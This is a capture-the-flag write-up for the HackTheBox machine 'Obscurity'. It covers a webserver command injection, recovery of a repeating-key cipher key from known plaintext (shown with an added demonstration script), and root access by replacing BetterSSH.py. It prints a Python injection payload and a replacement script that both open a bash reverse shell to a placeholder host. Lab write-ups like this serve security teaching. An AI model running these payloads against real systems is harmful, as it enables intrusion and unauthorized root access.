Obscurity @ HackTheBox
Obscurity is a 30-point Linux machine on HackTheBox that involves exploiting a command injection in a custom webserver, breaking a simple cipher and abusing file system permissions to get root.
Notes
Command injection payload:
';__import__("os").system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")+'
Retrieving the key:
python3 SuperSecureCrypt.py -d -i out.txt -k "`cat check.txt`" -o key
Decrypting the ssh password:
python3 SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /dev/shm/x
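Why running the decrypt routine on out.txt with the contents of check.txt as the "key" returns the real key, shown as an added example that is not from the original post and is not the machine's SuperSecureCrypt.py. It assumes a repeating-key additive cipher (the script's internals are not shown in these notes); all function names and sample values are constructed.

```python
from itertools import cycle


def encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Stand-in cipher (assumed design): add the repeating key, byte by byte, mod 256."""
    return bytes((p + k) % 256 for p, k in zip(plaintext, cycle(key)))


def decrypt(ciphertext: bytes, key: bytes) -> bytes:
    """Inverse of encrypt: subtract the repeating key, mod 256."""
    return bytes((c - k) % 256 for c, k in zip(ciphertext, cycle(key)))


def shortest_period(stream: bytes) -> bytes:
    """Collapse a repeated keystream to its shortest repeating unit."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known-plaintext recovery: since c = p + k, 'decrypting' with p as key gives k."""
    keystream = decrypt(ciphertext, known_plaintext)
    return shortest_period(keystream)


# Constructed sample data standing in for check.txt, out.txt and passwordreminder.txt.
KEY = b"constructed-key"
KNOWN_PLAINTEXT = b"Constructed known plaintext, longer than the key, like check.txt."
KNOWN_CIPHERTEXT = encrypt(KNOWN_PLAINTEXT, KEY)
SECRET = b"constructed-password"
SECRET_CIPHERTEXT = encrypt(SECRET, KEY)

if __name__ == "__main__":
    key = recover_key(KNOWN_PLAINTEXT, KNOWN_CIPHERTEXT)
    print("recovered key:", key.decode())
    print("second file  :", decrypt(SECRET_CIPHERTEXT, key).decode())
```

Any scheme in which ciphertext minus plaintext equals key material leaks its key to anyone holding one plaintext/ciphertext pair; an authenticated cipher such as AES-GCM with a unique nonce per message does not have this property.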
Replaced BetterSSH.py:
import os
os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")
This post is licensed under CC BY 4.0 by the author.